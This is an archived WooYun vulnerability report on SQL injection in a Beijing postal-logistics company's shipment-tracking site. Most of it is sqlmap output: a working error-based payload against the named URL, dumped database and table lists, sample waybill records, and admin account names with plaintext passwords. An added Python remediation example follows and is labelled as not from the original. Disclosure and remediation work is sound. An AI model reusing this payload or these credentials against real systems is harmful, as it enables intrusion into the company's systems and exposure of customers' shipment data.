WooYun (WooYun.org) historical vulnerability archive---http://wy.zone.ci/
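2016-04-09: Details reported to the vendor; awaiting vendor handling
2016-04-09: Vendor confirmed; details disclosed to the vendor only
2016-04-19: Details disclosed to core white hats and experts in related fields
2016-04-29: Details disclosed to regular white hats
2016-05-09: Details disclosed to intern white hats
2016-05-24: Details disclosed to the public
SQL injection in multiple places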
http://www.bj-cnpl.com
The system of China Postal Express & Logistics Co., Ltd., Beijing Branch has SQL injection in multiple places, leaking some waybill information.
http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1
The orderno parameter is vulnerable to SQL injection.
current user: 'cnpluser'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] AT
[*] ATRACK
[*] master
[*] model
[*] msdb
[*] tempdb
Database: ATRACK
[19 tables]
+---------------------+
| CNPL_DNJ_REDOC      |
| Logistic_DNJ        |
| Logistic_POD_Status |
| Logistic_Russia     |
| Logistic_Shipment   |
| Logistic_State      |
| Logistic_Upload_D   |
| Logistic_Upload_I   |
| Logistic_Upload_M   |
| Logistic_User       |
| MAN_DT              |
| MAN_HD              |
| atrackdssw21        |
| atrackdssw22        |
| atrackdssw23        |
| atrackdssw24        |
| atrackdssw25        |
| sysdiagrams         |
| 中邮与俄方状态对照表|
+---------------------+
Database: ATRACK
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.Logistic_State      | 1641873 |  (transit information)
| dbo.CNPL_DNJ_REDOC      | 348257  |
| dbo.Logistic_Upload_I   | 1259    |
| dbo.Logistic_Upload_M   | 1237    |
| dbo.Logistic_Shipment   | 941     |
| dbo.Logistic_POD_Status | 47      |
| dbo.Logistic_Russia     | 23      |
| dbo.MAN_DT              | 17      |
| dbo.Logistic_User       | 11      |
| dbo.Logistic_Upload_D   | 6       |
| dbo.MAN_HD              | 6       |
| dbo.Logistic_DNJ        | 1       |
+-------------------------+---------+
Table: Logistic_State
[3 entries]
+-------------------+-------------------+-------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| Logistic_State_ID | Logistic_State_No | Logistic_State_DT | Logistic_State_Eng              | Logistic_State_Chn | Logistic_State_OPS | Logistic_State_Memo             | Logistic_State_City | Logistic_State_Time | Logistic_State_Sign | Logistic_State_Code_Problem | Logistic_State_Code_PINumber |
+-------------------+-------------------+-------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| 10000             | BPIL870050205     | 11 20 2012 1:18PM | Arrived on an airport warehouse | 到达机场监管中心   | admin              | Arrived on an airport warehouse | Moscow, Russia      | 11 10 2012 3:00PM   | <blank>             | <blank>                     | STA 56                       |
| 100000            | CT287578855CN     | 02 27 2014 9:06AM | Shipment Out of Delivery        | 快件外出派送       | admin              | <blank>                         | CANADA              | 02 26 2014 12:19PM  | <blank>             | <blank>                     | SH003                        |
| 1000000           | 98723A925         | 09 22 2015 8:25AM | Shipment forwarded              | 快件转运           | admin              | <blank>                         | 东莞                | 09 22 2015 6:57AM   | <blank>             | <blank>                     | SH272                        |
+-------------------+-------------------+-------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
User passwords and the like are not encrypted.
+------------------+--------------------+---------------------+-----------------------+------------------------+
| Logistic_User_ID | Logistic_User_Name | Logistic_User_Power | Logistic_User_Enabled | Logistic_User_Password |
+------------------+--------------------+---------------------+-----------------------+------------------------+
| 1                | admin              | ADMIN               | YES                   | lzyouzheng             |
| 10               | emskf              | ADMIN               | YES                   | kefuzhongxin           |
| 11               | guoji              | ADMIN               | YES                   | guojifengongsi         |
+------------------+--------------------+---------------------+-----------------------+------------------------+
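After logging in to the admin back end, it turns out the back end has SQL injection as well: in the "add new status" form, enter "'".
Two other locations: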
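The remediation for the two findings above (injectable orderno lookup and plaintext Logistic_User_Password), as an added example that is not code from the original report or from the affected site: the lookup binds orderno as a query parameter behind an allow-list check, and passwords are stored as salted PBKDF2 hashes. Python's sqlite3 stands in for the site's ASP/SQL Server stack; table and column names are taken from the dump above, while the reduced schema, the salt and pw_hash columns, the length bound, the work factor and the sample row are assumptions.

```python
import hashlib, hmac, os, re, sqlite3

# Waybill numbers in the report are short alphanumeric strings; the 6-20
# length bound is an assumption for this example.
ORDERNO_RE = re.compile(r"[A-Za-z0-9]{6,20}")
PBKDF2_ROUNDS = 600_000  # assumed work factor

def open_db():
    """In-memory stand-in for ATRACK with one constructed sample row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Logistic_State "
               "(Logistic_State_No TEXT, Logistic_State_Eng TEXT)")
    db.execute("CREATE TABLE Logistic_User "
               "(Logistic_User_Name TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    db.execute("INSERT INTO Logistic_State VALUES (?, ?)",
               ("TEST000000001CN", "Shipment forwarded"))
    return db

def show_state(db, orderno, validate=True):
    """Return tracking states for a waybill; None means input was rejected."""
    if validate and not ORDERNO_RE.fullmatch(orderno):
        return None  # render a generic "not found"; never echo DB errors
    # orderno is bound as a parameter, so a quote in it stays data.
    rows = db.execute("SELECT Logistic_State_Eng FROM Logistic_State "
                      "WHERE Logistic_State_No = ?", (orderno,))
    return [r[0] for r in rows]

def _derive(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)

def set_password(db, user, password):
    """Store a per-user random salt and the derived hash, never the password."""
    salt = os.urandom(16)
    db.execute("INSERT OR REPLACE INTO Logistic_User VALUES (?, ?, ?)",
               (user, salt, _derive(password, salt)))

def check_password(db, user, password):
    row = db.execute("SELECT salt, pw_hash FROM Logistic_User "
                     "WHERE Logistic_User_Name = ?", (user,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(_derive(password, row[0]), row[1])
```

The same binding applies to the back-end "add new status" form; the error-based technique in the sqlmap output additionally depends on database error text reaching the response, so suppressing detailed errors is a second layer, not a substitute.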
Severity: Medium
Vulnerability Rank: 5
Confirmation time: 2016-04-09 20:12
Thank you.
None yet.